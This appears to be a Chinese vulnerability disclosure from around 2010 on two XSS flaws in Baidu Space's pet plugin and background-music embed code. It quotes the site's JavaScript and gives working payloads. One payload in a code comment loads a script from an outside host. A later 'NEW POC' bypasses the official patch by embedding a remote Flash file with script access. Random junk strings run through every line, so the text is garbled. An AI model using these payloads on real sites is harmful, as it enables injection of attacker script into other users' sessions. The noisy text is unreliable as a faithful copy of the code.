百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
$ m. Q$ l3 w& }- D2 @* y
3 A$ I* }+ j, }9 W3 d1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
9 l6 a& X: y, E$ r5 S2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 ; K% s2 _ n( W7 S- R
! t' u G# O. x- Y0 ]7 G, ~) C
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
% s1 `5 ^4 W1 C2 a其中BdUtil.insertWBR为 ! Z% h' C$ N6 m0 H( m, s. h% X8 M* Y3 j
function(text, step) {
; p/ s% s' F. T6 L s var textarea = textAreaCache || getContainer();
. _4 W* b- g* W3 V if (!textarea) { 4 B4 H: P/ f" ^0 Z ]
return text;
" A2 Z& D6 S! e. k, Y w }
; U) i0 T9 s0 P1 @3 n) F textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
) W" P& D7 Q U, A var string = textarea.value; 1 o. f/ Y4 m% a6 C4 ?; @
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi"); * B- b' L: v& w. Q. U
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
+ O# H1 [( p7 l% B return result; 1 @( c& H- o- P3 D1 L
}
- _" }' n+ S0 b; L+ Z3 [3 a在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.
" d9 G" y7 S B# _( s8 e9 T3 ]( R测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
; y5 c. u: K1 O' N- P! f p7 y & ?% V9 Z4 z% x4 z4 l
二:creatbgmusic() Dom-Xss Bug
& {) I! r& }. j. P百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
! Q9 x3 C) T. a; Y; O4 p- `: p5 m
在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: # @, x" `# N% B2 c3 B( z5 p& Z; B
% O) M5 y3 `7 U. L; T* V
function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { 6 p6 m5 H9 I+ J1 ]! W) j/ B
//传入的murl赋值到bgmusic1和bgmusic2中 ) G2 z- b6 X7 {4 ?- k3 q
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 ( l- i7 o1 h2 x2 Q( B" `4 j
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
0 ^- ]5 b0 |& g: `1 \% h if (musicnum <= 1) {
; l1 W" N. }. x bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; 5 G5 [! N" \* `' ]+ ~' K) h' e" C
} 2 V) X$ k# o, Z7 l
bgmusic1 += "</OBJECT>"; / h E6 U7 K9 Z. o0 o
var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; 0 b, `; V7 j; e, u& d" \( t
if (musicnum <= 1) {
6 P M' m' K( F# |" G! A bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
/ a2 ~/ k+ S9 y9 C+ {4 \& a } , _5 l* Q$ h% [+ a) `
bgmusic2 += "> </EMBED>"; ' y) y* F- ?3 x) M! o
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
) X8 S! a% m* o: y var bgmus = detectWMP(); ! C/ s' }0 q5 Z$ [- A
if (functype == "FckMusicHelper") { / h7 E& g2 j& T! l7 r9 p; p
if (bgmus.installed) { 6 E% O/ L6 k- r
if (bgmus.type == "IE") {
R. x9 R* h% t( ^) K2 h return bgmusic1;
6 h4 p7 m: b$ I } else if (bgmus.type == "NS") {
2 G2 z6 a) T. [ return bgmusic2;
/ J6 n: _2 K+ [) X" f ] } . U, n/ f! |& U( j
} else {
9 V8 ?8 A! @7 l" P return bgmusic3;
; ~- w# ^8 [. ^( R } : m. H* {9 u- O! q( l. V( N& T
} else {
0 h3 k% S0 h' Y: b if (bgmus.installed) {
7 r5 x9 W) Z k6 B& `6 c8 L //document.write 直接输出bgmusic变量 导致xss : \# o) a8 J0 U
if (bgmus.type == "IE") {
& H1 T2 d9 L% q document.write(bgmusic1);
3 F5 @7 w8 B8 L) F } else if (bgmus.type == "NS") { 4 }3 W+ ~" q# d4 x8 m( d
document.write(bgmusic2);
2 o: A8 `, A/ L } ! Z' Y5 v, s: D3 |% ~; I3 `( k
} else {
' Y+ B6 q7 b: {0 U$ W( i document.write(bgmusic3);
9 d0 G1 a3 C0 a- ~ } / ]/ b' N$ K. |& S" b3 C: w1 ^/ ?
return "";
6 W, _9 L+ l* h6 T } 0 |* `$ V3 H6 r1 Z
} ' }3 N5 T y# A
2 q0 }9 J9 f! t) [8 D
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
1 X- T6 A" @6 M; Z; P: x# Y
5 y" v: B3 }$ G3 P1 T% ~' S' Pfunction initBlogTextForFCK(){
/ T; D# `; \! }2 N( M. m" m: x//fck init music + T2 l3 z; Z* O! W' f
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
1 {+ e2 _% k3 C/ L7 @( L9 n, nvar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组 : ~, p& G- x% K) r+ U3 J0 I a
var isAutoPlay=true; 8 d( X! N6 T4 D; N9 T
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. ' }+ G3 r) h w1 W# z: `' e2 R
var img=imgBox; 1 a* \+ N. T( _. x2 z
if(img.getAttribute(’rel’)){ & H8 M/ t. f V9 ^3 h) f; V
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
' ^, p. y8 a: l% I$ U1 t7 d var musicDiv = document.createElement("SPAN");
|. T* x( y2 K& V5 e8 u var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp] * ?) m q2 U. v& R
0 n$ H: M: V7 h
..........................
% b% w! L2 O0 r " X# `7 g3 }% v* w# ?
//直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来. 9 g1 l" c4 J5 [. @; @
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); ' T2 Z" _, l* Q7 V, y6 I/ g, o
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
& Q) `; ]# F) V musicDiv.innerHTML=shtml;
4 ^0 B/ r7 l! g- D0 M2 ^9 ~ i--;n--; ' I# w- A+ H; r3 G; l0 }5 T
} G4 @4 f' d7 b( |9 K! I9 ]5 l
} # ]& o+ ^# _3 Y
0 B; z% x/ q" L$ O( Z/ I8 a9 {2 E
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
& U8 X6 p! {, M7 `: Z4 e8 m 4 y$ C* R+ s0 [
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> 0 y9 z4 M. D1 h/ Z3 S5 ^2 @
. T0 Y7 s( z2 k: X6 w3 @ O% ^" \
等待官方补丁 1 R! i& \2 y. h) e8 g. }5 L
! K! J# F+ D, F" s. V$ c( `
update 2010年5月13日 * X3 D( |6 M9 G9 s4 T: C) \& U4 {( L
4 z+ j8 ?" R' k8 c" U. z官方补丁: 4 a# [" o- X0 A( d! ?
9 O5 F$ I6 g4 t$ ]# R. Gvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); # x) `4 T9 l1 _) F; \! @
改为: . Q5 S$ W) z$ D: v& ~
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); ) U3 h+ B8 s, D4 i: X/ v7 T- x0 D- V
+ x! @. l% Y. {! V: d6 G; Y! [update 2010年5月13日 21:50:37
6 T: x4 m# \* D! D2 \+ [2 H2 I9 r" F8 X8 N7 S% X; c/ Z
补丁存在漏洞 没有过滤" 可以继续跨: ) O: s N# H/ ~3 O H
6 X2 v3 s" G+ v7 V5 G& D) o3 \
NEW POC:
# x. E R6 H, U- R2 _" y/ Z) C+ s/ {5 _6 ]" ^7 l
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf"
4 w+ O5 G# y3 z7 {
% D# C# w( A+ P- G8 Yallowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
0 o0 u4 O+ M1 j3 H; _ ' Q i/ |0 g% H3 S: _6 R5 i
|